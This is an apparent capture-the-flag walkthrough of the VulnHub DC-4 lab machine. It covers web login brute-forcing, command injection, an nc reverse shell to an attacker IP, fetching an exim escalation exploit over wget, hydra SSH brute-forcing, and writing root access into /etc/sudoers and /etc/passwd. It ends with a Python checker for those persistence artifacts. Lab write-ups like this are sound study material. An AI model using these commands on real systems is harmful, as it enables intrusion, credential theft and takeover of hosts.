DC-4
DC: 4 ~ VulnHub
Article directory
- DC-4
- Information collection
- Web penetration
- Exploiting vulnerabilities
- Exploiting vulnerabilities to obtain a shell
- Privilege escalation 1
- Privilege escalation 2
- Summary
Information collection
- Use nmap to scan the 192.168.78.153 network segment where the target machine is located, then run a detailed scan of the target. Port 80 (web) and port 22 (ssh) are open. It feels like I will need a username and password to connect over ssh.
Web penetration
- Accessing the website shows a login window. The title hints at admin, so it feels like the username is admin. After looking around there is no further hint, so it seems the password will have to be cracked.
- Drawing on the experience from the web 1 target machine, I scanned it with dirb first; nothing notable turned up, so I just brute-forced the login directly.
- Enter some parameters, capture the submitted request, send it to the attack module, load the weak-password wordlist, run the attack, and obtain the password: happy
- After logging in, I found several functions. Running them shows that they are all Linux system commands, but there is no place to type a command myself. On a hunch I captured the request: would the executed command statement be visible in the packet?
Exploiting vulnerabilities
- As expected, the executed command really is visible in the captured request, so I start modifying it to see whether that works. Passing in id returns output successfully: there is an RCE (command execution) vulnerability.
- Since system commands can be executed directly, use nc to send the current web user's shell back to the attacking virtual machine. Enter
nc -e /bin/bash 192.168.78.145 7777
- Of course, my first reaction was to write a webshell (Trojan file), but the attempt failed. Trying it from kali, the parameters were lost, and even when writing it from burp the file was not created; perhaps the permissions are insufficient.
Exploiting vulnerabilities to obtain a shell
- Convert the reverse shell into an interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'
- First go to the home directory and see whether there are any files worth viewing.
- Check /etc/passwd and find three users with UIDs above 1000. It seems switching users over ssh will be indispensable.
- Going through the files, I found a backup password file in jim's folder.
Privilege escalation 1
- Use the find command to look for SUID binaries usable for privilege escalation
find / -user root -perm -4000 -print 2>/dev/null
- An exim4 binary turns up. I have used this privilege escalation before, so check the version.
- The version is 4.89, which seems to fall within the range of versions vulnerable to local privilege escalation.
searchsploit exim
- Find a usable privilege escalation PoC and locate it on disk
- Save the script to the desktop
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 1.sh
- Check the line-ending format of the PoC: it still has Windows line endings, so convert it to Linux line endings.
- Copy the script into /var/www/html, and use wget on the target machine to download the privilege escalation script.
Start the Apache service:
sudo service apache2 start
cp 1.sh /var/www/html/1.sh
chmod 777 1.sh
wget http://192.168.78.128/1.sh
- Execute the script to escalate privileges and verify
- View the flag file
Privilege escalation 2
- Now that there is a password file, the usernames must be the ones in the home folder. Use hydra to brute-force ssh
hydra.exe -L user.txt -P DC-4pass.txt ssh://192.168.78.153
jim : jibril04
- Log in as the jim user over ssh
- After looking around there is nothing else to check, and I cannot find the other users' passwords
grep -rns charles
- After consulting the wp (walkthrough), I found that I needed to check /etc/mail, where the password that the charles user sent to jim can be read.
- It turns out that the jim user has permission to read the mbox file. Its contents are an email message, which is what turned my attention to the mail under /etc/mail; mbox is itself a format for storing email messages.
- Log in to the account
ssh [email protected]
Password: ^xHhA&hvim0y
- Use sudo -l to check the current user's permissions and find that
/usr/bin/teehee
can be executed with root permissions without a password
- Looking at how teehee is used, we find that the -a parameter appends content to a file without overwriting it. This immediately brings to mind the DC-9 target machine, where an account and password could be written into /etc/passwd, and another account could likewise be given full root permissions by writing to /etc/sudoers
- So now proceed to give the charles user root permissions
charles ALL=(ALL:ALL) ALL
payload: echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
- sudo -l confirms that the user now has root privileges. Use sudo su directly to become root and enter the password.
- Get the flag
Summary
The DC-4 target machine felt quite easy this time. At least it is the first time I went straight from initial access to the privilege escalation part without looking at the wp, because the exim4 PoC had been used before, so I escalated directly to root. Only during the second, routine privilege escalation did I check the mail file and find the hidden password.
- Brute-force the website login
- The command execution in the web shell directly sends a reverse shell to kali.
- find located the SUID exim4 binary, then the matching privilege escalation PoC
- When files cannot be uploaded to the target machine directly, host them on the attacking virtual machine's web server and fetch them with wget.
- hydra brute-forces the ssh login
- mbox is a mail format; /etc/mail holds the mail messages
- Use --help to view the usage of teehee
- With arbitrary file writes, you can try appending a new account with root permissions to /etc/passwd, or give the current account full root permissions via /etc/sudoers.
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
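As an added defensive check (not part of the original writeup), the following Python audits /etc/passwd and sudoers text for the two persistence artifacts the teehee section and this summary describe: a second UID-0 account and an unrestricted or NOPASSWD tee-style sudo rule for an ordinary user. The sample file contents are constructed, and the tee/teehee name match is an assumption about what a file-writing helper is called on a given host.

```python
import re

# Constructed samples (not from the DC-4 machine): /etc/passwd with an extra
# UID-0 account appended, sudoers with an unrestricted and a NOPASSWD rule.
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
charles:x:1000:1000:Charles,,,:/home/charles:/bin/bash
jim:x:1001:1001:Jim,,,:/home/jim:/bin/bash
hacker:x:0:0::/root:/bin/bash
"""
SUDOERS_SAMPLE = """Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
charles ALL=(ALL) NOPASSWD: /usr/bin/teehee   # tee-like helper
charles ALL=(ALL:ALL) ALL
"""

def find_extra_uid0(passwd_text):
    """Return every account name with UID 0 other than root."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # blank, comment or malformed line
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            hits.append(name)
    return hits

# user  host = (runas) commands   ('=' may be surrounded by spaces)
SUDO_RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(\([^)]*\))?\s*(?P<cmds>.*)$")

def find_risky_sudo(sudoers_text):
    """(user, cmdspec) for user rules granting ALL or NOPASSWD tee/teehee."""
    hits = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_RULE.match(line)
        if not m or m.group("who") == "root" or m.group("who").startswith("%"):
            continue  # root and %group rules are expected defaults
        cmds = m.group("cmds").strip()
        if cmds == "ALL" or re.search(r"NOPASSWD:.*\b(tee|teehee)\b", cmds):
            hits.append((m.group("who"), cmds))
    return hits

if __name__ == "__main__":
    print("extra UID-0 accounts:", find_extra_uid0(PASSWD_SAMPLE))
    print("risky sudo rules:", find_risky_sudo(SUDOERS_SAMPLE))
```

Feed it the contents of the real files (for example via sudo cat) to run the same check on a live host.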